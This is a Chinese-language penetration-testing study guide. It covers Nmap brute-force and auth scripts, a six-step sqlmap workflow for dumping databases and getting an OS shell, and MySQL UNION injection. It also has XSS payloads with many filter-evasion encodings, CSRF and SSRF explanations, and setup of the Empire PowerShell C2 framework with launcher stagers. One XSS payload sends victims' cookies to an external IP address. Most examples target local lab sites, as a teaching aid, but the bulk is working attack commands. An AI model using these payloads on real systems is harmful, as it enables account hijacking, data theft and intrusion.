网络渗透知识

1. Nmap的基本Nmap + ip 6+ ipNmap -A 开启操作系统识别和版本识别功能– T（0-6档）  设置扫描的速度  一般设置T4    过快容易被发现-v 显示信息的级别，-vv显示更详细的信息192.168.1.1/24 扫描C段   192.168.11 -254 =上nmap -A -T4 -v -iL   ~/targets.txt   (iL表示要扫描的目标位于一个文档中)    --------------- 192.168.1.1/24  --exclude 192.168.1.100  （排除在外的目标 .100）    --------------- -----------------excludefile  ~/targets.txt    nmap 192.168.1.1   -p 80.443 网站  是否在这个端口部署网站    nmap –traceroute 192.168.1.1   探测路由    nmap -O 192.168.1.1              对目标进行指纹识别    nmap -sV    ----------         对版本进行探测    nmap -sF -T4 192.168.1.1         利用fin包对端口进行扫描，识别是否被关闭，收到RST包，说明被关闭。否则是open 后者 fileter状态。  （利用三次握手，可以绕开防火墙）    nmap –script=auth+ip 处理鉴权证书的脚本，也可以作为检测部分应用弱口令    -----------=brute+ip 暴力破解    扫描脚本介绍:位置 : nmap安装目录/scripts/     例如/usr/share/nmap/scripts脚本类型：

ll /usr/share/nmap/scripts | grep ^- | wc -l

 使用介绍:

nmap --script=auth 192.168.137.*负责处理鉴权证书（绕开鉴权）的脚本,也可以作为检测部分应用弱口令nmap --script=brute 192.168.137.*提供暴力破解的方式  可对数据库，smb，snmp等进行简单密码的暴力猜解nmap --script=default 192.168.137.* 或者 nmap -sC 192.168.137.* 默认的脚本扫描，主要是搜集各种应用服务的信息，收集到后，可再针对具体服务进行攻击。nmap --script=vuln 192.168.137.*  检查是否存在常见漏洞nmap -n -p445 --script=broadcast 192.168.137.4在局域网内探查更多服务开启状况

zenmapNmap 的图形化界面：

 2.SQLmap 简介是一种开源的渗透测试工具，可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。支持的数据库：MySQL，Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 安装sqlmap前，需要先安装Python3.Xhttps://www.python/downloads/windows/在环境变量path中，增加python3.x 安装路径下载sqlmap并解压缩：地址：https://sqlmap/Python sqlmap.py -u http://xxx.xxx.xxx/Python sqlmap.py –help 查看帮助 borp sqlmap支持五种不同的注入模式：UNION query SQL injection（可联合查询注入）uError-based SQL injection（报错型注入）uBoolean-based blind SQL injection（布尔型注入）uTime-based blind SQL injection（基于时间延迟注入）uStacked queries SQL injection（可多语句查询注入）

2.sqlmap 常用命令参数-u /--url 最基本格式 sqlmap -u “XXXXXXXXXXXXX/index.pho?id=1”-m 从文本中获取多个目标扫描，但是每一个一个url. sqlmap -m urllist.txt-r 从文件中加载HTTP请求，这样的话就不需要再去设定cookie，POST数据….--dbs 返回当前连接的数据库--current-db 返回当前网站数据库的数据库用户-D 指定数据库系统的数据库名--tables 列举数据库表-T 指定数据库表名--columns 列举数据库表中的字段-C 指定数据库表中的字段名--dump 获取整个表的数据

3.设置回显等级参数： -v默认为10 只显示python错误以及严重的信息1 基本信息和警告信息2 debug信息3 注入的payload（级别越高显示信息越多） 4同时显示HTTP请求。5同时显示HTTP响应头。6同事显示HTTP响应页面。--data 把数以post方式提交，sqlmap会像检测GET参数一样检测POST过去的参数。--cookie （用于区分用户）可能会有漏洞，当web登录时，抓取数据包。

4.设置HTTP数据包相关参数HTTP User-Agent 头参数：--random-agent 会从sqlmap/txt/user-agents.txt中随机产生User-Agent头。sqlmap -u “http://www.target” --level 3 --andom-agent --dbssqlmap 检查uesr-agent中的注入点, level>=3才会去检查user-agent头是否存在注入漏洞5.设定探测等级：--level共有五个等级 默认为1 sqlmap使用的payload可以在xml/payloads.xml中看到--users 列数据库管理用户--current-user 在数据库中，目前连接的用户--is-dba 判断当前是否为管理，是的话返回true--proxy 指定一个代理服务器 eg: -proxy http://xxxxxx.8080--os-shell 前提：需要网站的物理路径，其次是需要有FIILE权限 6.Sqlmap“六步”第一步：判断是否注是注入点sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” 检测该网站是否存在漏洞 白色加粗字体为注入点 也就是攻击对象

 第二步：获取数据库sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” –dbs 

 第三步：查看当前应用程序所用数据库sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” --current-db

 四：列出指定数据库的所有表sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1(目标链接)” -D”security（目标数据库）”—tables

 五：读取指定表中的字段名称sqlmap.py-u“http://localhost/sqlilabs/Less-1/?id=1(目标链接)”-D”security”-Tusers–colunms

 六：读取指定字段内容sqlmap.py-u“http://localhost/sqlilabs/Less-1/?id=1(目标链接)”-D”security”-Tusers-Cusername,password–dump（dump=下载，脱库）

 判断当前数据库用户权限：sqlmap.py-u“http://localhost/sqlilabs/Less-1/?id=1(目标链接)”--is-dba如果是TRUE，那么权限该用户很大。

-roles列出数据库管理员角色如果当前用户有权限读取包含所有用户的表，输入该命令会列举出每个用户的角色，sqlmap-u"http://127.0.0.1/sqli-labs-master/Less-1/?id=1"--roles

-refererHTTPReferer头当–level参数设定为3或3以上时，会尝试对HTTPReferer注入。可以使用referer命令来欺骗，如--refererhttps://mp.mysite-sql-shell运行自定义的sql语句sqlmap-u"http://127.0.0.1/sqli-labs-master/Less-1/?id=1"--sql-shell运行任意操作系统命令：选择后台语言sqlmap-u"http://127.0.0.1/sqli-labs-master/Less-1/?id=1"--os-cmd=whoami

 --os-cmd=whoami--os-shell

(以你的电脑为跳板，对局域网进行渗透，或留后门）

--file-read从数据库服务器中读取文件：当前用户有权限使用特定的函数时，读取的文件可以是文本，也可以是二进制文件。上传文件到数据库服务器中：--file-write--file-dest读取指定数据库用户的密码sqlmap-u"http://xxxxx/fuzz/index.php?id=1"--passwords-Uroot

 SQLMAP进阶常用tamper脚本apostrophemask.py将引号替换为utf-8，用于过滤单引号（易容术）适用数据库：ALL作用：将引号替换为utf-8，用于过滤单引号使用脚本前：tamper("1AND'1'='1")使用脚本后：1AND%EF%BC%871%EF%BC%87=%EF%BC%871multiplespaces.py围绕sql关键字添加多个空格去绕过适用数据库：ALL作用：围绕sql关键字添加多个空格使用脚本前：tamper('1UNIONSELECTfoobar')使用脚本后：1UNIONSELECTfoobar

3.BurpSuite工具

1.使用前配置①选择代理Proxy选项卡②选择设置option选项卡③Edit    Running打勾 124.0.0.1:8080

 

 配置成功

 历史访问

 

二、功能模块讲解

 

 

 

 

 

模块介绍

send to spider 发送给爬虫模块do a active scan 进行一次主动扫描send to intruder 发送给爆破模块send to repearter 发送给重放模块send to comparer 发送给比对模块send to decoder 发送给解码模块request in browser 将请求在浏览器重放 四：MYSQL与SQL注入mysql知识点- 基本查询语句查询表中全部信息： select *from 表明-关键的函数select+以下语句    version() 数据库版本    database() 数据库名    user() 用户名    current_user() 当前用户名    system_user() 系统用户名    @@datadir 数据库路径    @@version_compile_os 操作系统版本-order by（排序） 语法 -联合查询order by 1—order by 2—确定字段数   使用UNION操作符注入另外一个select查询，并将查询结果附加在第一次查询结果之后。第二次查询能够从另外一个完全不同的数据库表中提取数据  注意： 相同的列结构         需要有知道表结构，列结构    exists（）函数猜解表明    information_schema 是一个mysql系统自带的元数据库information_schema.SCHEMATA 查看所有的数据库

五、 XSS基础

1、什么是XSS? 中文名为跨站脚本攻击，跨站脚本，(Cross-Site Scripting, XSS)，当目标网站用户在渲染HTML文档的过程中，出现非预期的脚本指令并执行时，XSS就发生了。

2、攻击者给予应用恶意XSS代码，导致用户访问应用或服务器时执行代码，导致被XSS攻击。 攻击者→服务器→用户（xss是一种迫使Web站点回显可执行代码的攻击技术，而这些可执行代码由攻击者提供、最终为用户浏览器加载）

3、XSS的危害： 1.网络钓鱼，包括盗取各类用户的账号 2.窃取用户cookies资料，从而获取用户信息。 3.获取客户端信息，IP/端口等 4.劫持用户浏览器会话，从而执行任意操作 5.强制弹出窗口。 6.网页挂马，进行恶意操作 7.进行大量的客户端攻击 如DDoS攻击 8.控制受害者机器向其他客户端攻击

4、XSS分类 ①反射型 ：非持久型，调取用户cookie或者进行钓鱼，常常为通过引诱用户点击一个恶意链接来实施攻击。（特点：① 主要用于将恶意脚本附加到URL地址的参数中② 只在用户单击url时触发,而且只执行一次,非持久化③常用来窃取客户端 Cookies或进行钓鱼欺骗.④常常为通过引诱用户点击一个恶意链接来实施攻击的）name为可控参数

 

 我们可以通过执行恶意代码弹窗，那么也能做些对我们有利的事情。

当我们构造好了如下恶意代码，发送给受害者。<script>alert(document.cookie)</script> 将会弹出用户的cookie值，我们构造js代码，将该cookie值发送至我们自己的服务器，或者用XSS平台接收该cookie（例如https://xsshs/），我们就能通过该cookie非法登录受害者的账户。

 

 ②存储型 ：渗透 挂马 蠕虫病毒 出现在网站的留言、评论、日志等交互处，被存储在数据库或者客户端中，等再次浏览时受到攻击。（特点：① 恶意代码被保存到目标网站的服务器中，每次用户访问时都会执行脚本代码，这种攻击具有较强的稳定性和持久性 ② 比反射型跨站脚本更具威胁性,并且可能影响到Web服务器自身的安全. ③ 一般出现在网站的留言、评论、日志等交互处,）页面原理： POST提交数据，生成、读取文本模拟数据库，提交数据之后页面会将数据写入sql.txt， 再打开页面时会读取sql.txt中内容并显示在网页上，实现了存储型xss攻击模拟。当输入恶意代码，即会执行<script>alert('xss')</script>并且恶意代码会一直存储在服务器，每当有用户访问该页面，即会触发恶意代码

  利用XSS弹出恶意警告框 <script>alert('hacked by cl4y')</script>

网页不停刷新<meta http-equiv= 'refresh' content= '0' > http://192.168.127.1/ctfteach/demo/xss/reflect_xss.php?name=<meta httpequiv= 'refresh' content= '0' >

获得cookie<script>window.location.href='http://118.25.14.40:8200/?cookie='+document.cookie</script>

劫持流量（跳转到你的博客强行吸粉）<script>window.location.href="http://www.cl4y.top";</script>

③dom型： 将XSS代码嵌入dom文档（每一个网页），通过JS脚本对文档对象进行编辑从而修改页面元素，增加漏洞。 xss平台1.获取COOKIE(这是必须的最基本的功能) 2.获取源码(取当前网页的源码)3.截图(可自己修改为连续截图)4.……………https://xss.pthttps://xssaq

XSS利用——无任何过滤<scirpt>

<scirpt>alert(1);</script>

<img><img src=1 οnerrοr=alert("xss");> //onerror等事件，可以调用js

<input><input οnfοcus="alert('xss');" autofocus>

<svg><svg οnlοad=alert("xss");><iframe><iframe οnlοad=alert("xss");>

</iframe><iframe src=javascript:alert('xss');></iframe> //src中支持伪协议<textarea><textarea οnfοcus=alert("xss"); autofocus>往往用户可控的参数都进行了过滤，不会让你用一个<script>标签就轻易攻击成功<script>shellcode</script>XXS绕过：关键字绕过空格绕过用/代替空格 <img/src="x"/οnerrοr=alert("xss");>关键字绕过大小写绕过 <ImG sRc=x onerRor=alert("xss");>利用其他标签双写关键字 <imimgg srsrcc=x οnerrοr=alert("xss");>字符拼接 <img src="x" οnerrοr="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)"> <script>top["al"+"ert"](`xss`);</script> 利用函数进行编码绕过Unicode绕过<img src="x" οnerrοr="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')"> 利用函数进行编码绕过ASCII码<img src="x" οnerrοr="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">Hex绕过<img src=x οnerrοr=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>Base64编码<img src="x" οnerrοr="eval(atob('YWxlcnQoJ3hzcycp'))"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="> 过滤括号当括号被过滤的时候可以使用throw来绕过<svg/οnlοad="window.οnerrοr=eval;throw'=alert\x281\x29';"> //异常处理反引号<img src=x οnerrοr=alert`1`>过滤双引号，单引号反引号<img src=1 οnerrοr=alert`1`;>js事件当某个位置的可控点在一个标签内，那么或许可以通过js事件来完成xss操作<img src=1 οnerrοr=alert`1`;>

 混淆：利用html标签格式的不严格、容错性。关键字中加空格加TAB回车url编码<img src="x" οnerrοr="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>Cref漏洞漏洞介绍:  一种对网站的恶意使用。与 xss相比不大流行（因此对其防范相当稀少，比xss更加具有危险性。   原理：利用目标用户身份，以目标用户名义执行非法操作（以目标用户名义发邮件，消息，盗取目标账号，购买商品，虚拟货币转账等），会泄露目标用户的财产安全。      Ps：（CSRF漏洞经常用来制作蠕虫攻击，刷SEO流量）靶场实战：漏洞分析：

 

 

 Ssrf漏洞：是一种由攻击者构造请求，由服务器发起请求的安全漏洞。与csrf最大的区别是一个是服务器，一个是由客户端发起的。在域名后增加url=语句，从而利用ssrf漏洞篡改脚本访问的地址。攻击方式如下：对外网，服务器所在的内网，本地进行端口扫描，获取的banner信息。B，攻击运行在内网或本地的应用程序。C，对内网web应用进行指纹识别，识别企业内部的资产信息。D.攻击内外网的web应用，主要是用HTTP请求就可以实现的攻击（比如struts2，sqli等等）利用file协议读取本地文件。 SSRF漏洞利用：测试地址：http://127.0.0.1.1/ssrf.php?Url=http:127.0.0.7/2.php页面ssrf.php实现的功能获取GET参数URL，然后将url的内容返回网页上。如果将请求的网址篡改为http://www.baidu，则会显示http://www.baidu的网页内容，但是，当设置参数URL为内网地址时，则会泄露内网信息。访问ssrf.php?Url=file://C:/wwindows/win.ini即可读取本地文件。

 Ssrf漏洞修复建议：，限制请求的端口只能为web端口，只允许访问HTTP和HTTPS的请求。限制不能访问的内网ip，以防止对内网进行攻击。屏蔽返回的详细信息。七，EmpireEmpire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具，具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能，还可以快速在后期部署漏洞利用模块，其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等，使用能够躲避内网检测和大部分安全防护工具的查杀，简单来说就有点类似Metasploit，是一个基于PowerShell的远程控制木马。Empire运行在linux平台上官方下载地址，不过很久没有更新，需要Python 2.6/2.7环境https://github/EmpireProject/EmpireKALI示例： git clone https://github/EmpireProject/Empire.git

 然后安装Empire的依赖，命令如下cd Empire cd setuppip install -r requirements.txt（若没有安装pip库，则需要先通过apt-get install pip进行安装）./install.sh在安装完依赖以后，返回上一级文件，启动Empire工具，命令如下：cd .../empire​ 若启动失败，则可能是因为依赖未完全安装好，只需要手动通过pip install xxx安装未安装好的依赖即可。启动时如果遇到如下报错

 可以将urllib3版本降级pip install urllib3==1.22重新设定bash reset.sh基本使用会涉及如下内容：1.帮助文档2.设置监听3.生成木马4.连接主机和基本使用5.信息收集6.权限提升帮助文档​运行Empire后，输入help命令查看具体的使用帮助。

 设置监听步骤如下：listeners #进入监听线程界面uselistener #设置监听模式info #查看具体参数设置set #设置相应参数execute #开始监听输入Listeners命令进入监听界面，按TAB键可以补全命令，按两次TAB键或者help可以显示可以利用的模块

 输入uselistener来设置采用何种监听模式，双击TAB可以看到有以下可以使用的模式。

 设置监听这里采用http监听模式，输入uselistener http。

 然后输入info命令查看具体参数设置。其中Require为True的值都需要被设置。

 通过set配置参数，并提供execeute执行，需要注意的是Empire不同于Metasploit，Empire命令是区分大小写的

 

通过back返回上一级，使用listeners或者list可以查看所设置的监听器

 

生成木马输入usestager后 空格加TAB键 查看可以设置的木马模式

 

木马就类似Metasploit中的payload，其中multi为通用模块，osx是Mac操作系统的模块，剩下的是Windows的模块。我们以 windows/launcher_bat为例，给大家说下过程，其他的使用都类似要使用launcher_bat，首先输入usestager windows/launcher_bat，然后输入info命令查看详细参数

 

通过set配置参数，我们需要设置一个 Listener 参数，即监听的名字（前面我们给监听起得一个名字test1），通过execeute执行，文件会生成到 tmp 目录下，如下所示

 

在目标主机上运行生成的launcher.bat，输入 agents 可以查看已经获得的会话